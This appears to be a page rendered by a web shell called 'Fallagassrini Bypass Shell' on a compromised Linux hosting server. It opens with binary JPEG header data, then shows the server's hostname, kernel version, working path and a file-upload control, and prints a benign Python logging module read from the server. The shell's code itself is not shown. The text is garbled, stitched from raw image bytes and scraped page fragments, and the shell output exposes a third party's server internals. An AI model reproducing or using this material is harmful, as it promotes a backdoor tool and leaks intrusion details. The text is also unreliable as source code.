����JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 ��C  !"$"$��C��$^"�� ���}!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������� ?��� �C����^�"��,k8`��98�?�þ�.� s$ֱ�$��Xw��_�Z��¿�2�b������97�8%�Q�}s\�ŴqXxzK1��\@N�2��<��J����Y{�lF/�Z=N[���xr�B�}��F�Jۨ<yǽw� 5���o۹��^s��(�!������fF*zn������5�`Z�}���Ҋ��<�Tr�m��5�W>"�>Ir�{�_+<��$$����C��_UC)�^�r2�5��d�:�(c����⣕�U .f�p�S�nF���e�\����Ӱ��.�չ�8�# �m=8��i���O�^)R��=�^��*_:�M������3��x����8�k�>��(�y��D�NY���ҵ�/v�-]W�Z���}h[*������'�y�m&e�`Xg>����%��̲y�����k�߆�՞��Kwwr��d󞼎����� r��;���M<���[A���C¤ozʪ�+h%��B����Jcd��`�*ǎ���Vz��%�6�}�G;���m�����c�Պ~�b���_a�aii�E4jPL���U�<����Ɗ��v�g?�q~!�v���c ��D��pA/����m|=�-nux��^H�ޔ�����|�mt<�Y�Vz&�)�7F�YY���Z��/��U֩w}-�@�up�O%�P? ��H��MÃ�v��Wa�j0 �����0}k+[As[S�c�y����эL� t9-0���]��J�����i�h�Jۜ���M:�+��d����^����uH�&^� �唉��KH��?�񯣾 ^]G�\�4�#r���� qRR���GV!�i~眦���]Ay6��O�#g��m��&;�U����V BH����� ~Y8��(� J4������{U���|���� �1�4�%��v0?6#{�����t񦊊�#+{��E�8v�?�����?�c��9R]^Q,h��#�����i����[Y�����'�Š+x�Y佑V�R�{ec1��%��|]��p=�Vԡ��ʺ��9�rOZ�����Y �L�(�^*;�O'�ƑYx���Q�d��ݵq��~�5�_uk�{yH$H��Z(�3 �)�����~G�� Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /var/opt/nydus/ops/primordial/log/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : //var/opt/nydus/ops/primordial/log/envelopedata.py

# -*- coding: utf-8 -*-
from typing import Optional
import logging
import logging.config
import os
import traceback

from primordial.log.data import LogData
from primordial.constants import IP


LOG = logging.getLogger(__name__)


class ConfigLogData(LogData):
    """Store configuration log data for passing to other logging classes and easy retrieval."""
    TYPE_FIELD = 'type'
    SUB_TYPE_FIELD = 'sub_type'
    DATACENTER_FIELD = 'datacenter'
    ENVIRONMENT_FIELD = 'environment'
    FIELDS = (TYPE_FIELD, SUB_TYPE_FIELD, DATACENTER_FIELD, ENVIRONMENT_FIELD)

    DEFAULT_TYPE = 'hfs'
    DEFAULT_SUB_TYPE = 'vhfs'
    DEFAULT_DATACENTER = 'local'
    DEFAULT_ENVIRONMENT = 'LOCAL'

    def __init__(self) -> None:
        super().__init__()
        self.set(self.TYPE_FIELD, self.DEFAULT_TYPE)
        self.set(self.SUB_TYPE_FIELD, self.DEFAULT_SUB_TYPE)
        self.set(self.DATACENTER_FIELD, self.DEFAULT_DATACENTER)
        self.set(self.ENVIRONMENT_FIELD, self.DEFAULT_ENVIRONMENT)


class PayloadLogData(LogData):
    """Extract and store payload log data for parsing and easy retrieval."""
    DATA_SCHEMA_VERSION = '1.0.0'
    LINENO_FIELD = 'lineno'
    RAW_FIELDS = (LINENO_FIELD,)

    def __init__(self, record: Optional[logging.LogRecord] = None) -> None:
        self.freefields = True
        super().__init__(record)

    def load(self, record: logging.LogRecord) -> None:
        super().load(record)
        self.set('msg', record.getMessage())
        self.set('pathname', record.pathname)
        self.set('class_name', None)
        self.set('module', record.module)
        self.set('filename', record.filename)
        self.set('func_name', record.funcName)
        self.set(self.LINENO_FIELD, record.lineno)
        self.set('version', self.DATA_SCHEMA_VERSION)
        if record.exc_info:
            exc_type, exc_value, exc_traceback = record.exc_info
            self.set('strace', ''.join(
                traceback.format_exception(exc_type, exc_value, exc_traceback)))


class ServiceLogData(LogData):
    """Extract and store service log data for parsing and easy retrieval."""
    NAME_FIELD = 'name'
    THREAD_FIELD = 'thread'
    FIELDS = (NAME_FIELD, THREAD_FIELD)

    def load(self, record: logging.LogRecord) -> None:
        super().load(record)
        self.set(self.NAME_FIELD, os.getenv('SYSLOG_IDENT') or record.processName)
        self.set(self.THREAD_FIELD, str(record.thread))


class HostLogData(LogData):
    """Extract and store host log data for parsing and easy retrieval."""
    SERVICE_FIELD = 'service'
    HOSTNAME_FIELD = 'hostname'
    IP_FIELD = 'ip'
    FIELDS = (HOSTNAME_FIELD, IP_FIELD, SERVICE_FIELD)

    def load(self, record: logging.LogRecord) -> None:
        super().load(record)
        self.set(self.HOSTNAME_FIELD, os.getenv('HOSTNAME'))
        self.set(self.IP_FIELD, IP)
        serviceLogData = ServiceLogData(record)
        self.set(self.SERVICE_FIELD, serviceLogData)


class EnvelopeRole(LogData):
    """Store log role (e.g. ''PERFORMANCE' ) for passing to other classes and easy retrieval."""
    ROLE_FIELD = 'role'
    ROLE_DEVELOPMENT = 'DEVELOPMENT'
    ROLE_PERFORMANCE = 'PERFORMANCE'
    ROLE_BUSINESS_ANALYTICS = 'BUSINESS_ANALYTICS'

    FIELDS = (ROLE_FIELD,)

    DEFAULT_ROLE = ROLE_DEVELOPMENT

    def __init__(self) -> None:
        super().__init__()
        self.set(self.ROLE_FIELD, self.DEFAULT_ROLE)

    def __str__(self) -> str:
        return str(self.get(self.ROLE_FIELD))

    __repr__ = __str__


class EnvelopeVersion(LogData):
    """Store Envelope version (e.g. '1.0.0') for passing to other classes and easy retrieval."""
    MAJOR_FIELD = 'major'
    MINOR_FIELD = 'minor'
    PATCH_FIELD = 'patch'

    FIELDS = (MAJOR_FIELD, MINOR_FIELD, PATCH_FIELD)
    RAW_FIELDS = FIELDS

    DEFAULT_MAJOR = 1
    DEFAULT_MINOR = 0
    DEFAULT_PATCH = 0

    def __init__(self) -> None:
        super().__init__()
        self.set(self.MAJOR_FIELD, self.DEFAULT_MAJOR)
        self.set(self.MINOR_FIELD, self.DEFAULT_MINOR)
        self.set(self.PATCH_FIELD, self.DEFAULT_PATCH)

    def __str__(self) -> str:
        return str(".".join([str(self.get(field)) for field in self.FIELDS]))

    __repr__ = __str__

    @staticmethod
    def fromString(version: str) -> 'EnvelopeVersion':
        major, minor, patch = map(int, version.split("."))
        envelopeVersion = EnvelopeVersion()
        envelopeVersion.set(EnvelopeVersion.MAJOR_FIELD, major)
        envelopeVersion.set(EnvelopeVersion.MINOR_FIELD, minor)
        envelopeVersion.set(EnvelopeVersion.PATCH_FIELD, patch)
        return envelopeVersion


class EnvelopeDataSchema(LogData):
    """Store Envelope data schema version (e.g. '1.0.0') for passing to other classes and easy retrieval."""
    NAME_FIELD = 'name'
    MAJOR_FIELD = 'major'
    MINOR_FIELD = 'minor'
    PATCH_FIELD = 'patch'
    VERSION_SEPARATOR = '.'
    NAME_VERSION_SEPARATOR = '-'

    FIELDS = (NAME_FIELD, MAJOR_FIELD, MINOR_FIELD, PATCH_FIELD)
    RAW_FIELDS = FIELDS

    DEFAULT_NAME = 'default'
    DEFAULT_MAJOR = 1
    DEFAULT_MINOR = 0
    DEFAULT_PATCH = 0

    def __init__(self) -> None:
        super().__init__()
        self.set(self.NAME_FIELD, self.DEFAULT_NAME)
        self.set(self.MAJOR_FIELD, self.DEFAULT_MAJOR)
        self.set(self.MINOR_FIELD, self.DEFAULT_MINOR)
        self.set(self.PATCH_FIELD, self.DEFAULT_PATCH)

    def __str__(self) -> str:
        version = str(
            self.VERSION_SEPARATOR.join(
                [str(self.get(field)) for field in (self.MAJOR_FIELD, self.MINOR_FIELD, self.PATCH_FIELD)]))
        return str(self.NAME_VERSION_SEPARATOR.join([self.get(self.NAME_FIELD), version]))

    __repr__ = __str__

    @staticmethod
    def fromString(data_schema: str) -> 'EnvelopeDataSchema':
        name, version = map(str, data_schema.split(EnvelopeDataSchema.NAME_VERSION_SEPARATOR))
        major, minor, patch = map(int, version.split(EnvelopeDataSchema.VERSION_SEPARATOR))
        envelopeDataSchema = EnvelopeDataSchema()
        envelopeDataSchema.set(EnvelopeDataSchema.NAME_FIELD, name)
        envelopeDataSchema.set(EnvelopeDataSchema.MAJOR_FIELD, major)
        envelopeDataSchema.set(EnvelopeDataSchema.MINOR_FIELD, minor)
        envelopeDataSchema.set(EnvelopeDataSchema.PATCH_FIELD, patch)
        return envelopeDataSchema

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net